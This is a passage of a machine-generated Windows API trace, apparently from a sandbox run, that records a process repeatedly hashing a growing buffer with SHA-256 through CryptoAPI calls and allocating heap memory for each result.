	[0193.779] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309028, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309028, pdwDataLen=0x1283b0) returned 1
	[0193.779] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.779] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.779] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.780] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.780] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0193.780] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309050
	[0193.780] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309050, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309050, pdwDataLen=0x1283b0) returned 1
	[0193.780] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.780] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.780] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.780] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.780] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0193.780] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309078
	[0193.780] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309078, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309078, pdwDataLen=0x1283b0) returned 1
	[0193.780] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.780] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.780] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.781] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.781] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0193.781] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23090a0
	[0193.781] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23090a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23090a0, pdwDataLen=0x1283b0) returned 1
	[0193.781] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.781] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.781] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.781] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.781] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0193.781] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23090c8
	[0193.781] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23090c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23090c8, pdwDataLen=0x1283b0) returned 1
	[0193.781] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.781] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.781] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.782] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.782] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0193.782] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.782] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23090f0
	[0193.782] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23090f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23090f0, pdwDataLen=0x1283b0) returned 1
	[0193.782] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.782] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.782] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.782] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.782] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0193.782] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.782] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309118
	[0193.782] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309118, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309118, pdwDataLen=0x1283b0) returned 1
	[0193.782] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.782] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.782] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.783] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.783] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0193.783] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309140
	[0193.783] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309140, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309140, pdwDataLen=0x1283b0) returned 1
	[0193.783] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.783] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.783] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.783] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.783] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0193.783] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309168
	[0193.783] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309168, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309168, pdwDataLen=0x1283b0) returned 1
	[0193.783] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.783] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.783] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.862] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.862] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0193.862] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309190
	[0193.862] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309190, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309190, pdwDataLen=0x1283b0) returned 1
	[0193.862] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.862] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.862] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.862] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.862] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0193.862] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23091b8
	[0193.862] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23091b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23091b8, pdwDataLen=0x1283b0) returned 1
	[0193.862] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.862] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.862] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.863] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.863] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0193.863] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23091e0
	[0193.863] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23091e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23091e0, pdwDataLen=0x1283b0) returned 1
	[0193.863] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.863] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.863] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.863] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.863] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0193.863] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309208
	[0193.863] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309208, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309208, pdwDataLen=0x1283b0) returned 1
	[0193.863] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.863] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.863] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.864] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.864] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0193.864] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309230
	[0193.864] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309230, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309230, pdwDataLen=0x1283b0) returned 1
	[0193.864] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.864] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.864] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.864] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.864] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0193.864] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309258
	[0193.864] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309258, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309258, pdwDataLen=0x1283b0) returned 1
	[0193.864] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.864] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.864] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.865] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.865] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0193.865] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309280
	[0193.865] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309280, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309280, pdwDataLen=0x1283b0) returned 1
	[0193.865] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.865] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.865] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.865] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.865] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0193.865] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23092a8
	[0193.865] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23092a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23092a8, pdwDataLen=0x1283b0) returned 1
	[0193.865] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.865] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.865] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.866] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.866] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0193.866] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23092d0
	[0193.866] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23092d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23092d0, pdwDataLen=0x1283b0) returned 1
	[0193.866] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.866] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.866] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.866] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.866] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0193.866] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23092f8
	[0193.866] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23092f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23092f8, pdwDataLen=0x1283b0) returned 1
	[0193.866] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.866] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.866] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.867] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.867] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0193.867] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309320
	[0193.867] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309320, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309320, pdwDataLen=0x1283b0) returned 1
	[0193.867] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.867] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.867] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.867] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.867] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0193.867] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309348
	[0193.867] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309348, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309348, pdwDataLen=0x1283b0) returned 1
	[0193.867] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.867] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.867] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.868] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.868] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0193.868] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309370
	[0193.868] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309370, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309370, pdwDataLen=0x1283b0) returned 1
	[0193.868] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.868] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.868] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.868] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.868] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0193.868] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309398
	[0193.868] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2309398, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309398, pdwDataLen=0x1283b0) returned 1
	[0193.868] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.868] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.868] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.869] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.869] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0193.869] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23093c0
	[0193.869] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23093c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23093c0, pdwDataLen=0x1283b0) returned 1
	[0193.869] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.869] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.869] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.869] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.869] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0193.869] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23093e8
	[0193.869] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23093e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23093e8, pdwDataLen=0x1283b0) returned 1
	[0193.869] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.869] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.869] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.870] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.870] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0193.870] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2309410
	[0193.870] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2309410, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2309410, pdwDataLen=0x1283b0) returned 1
	[0193.870] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.870] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
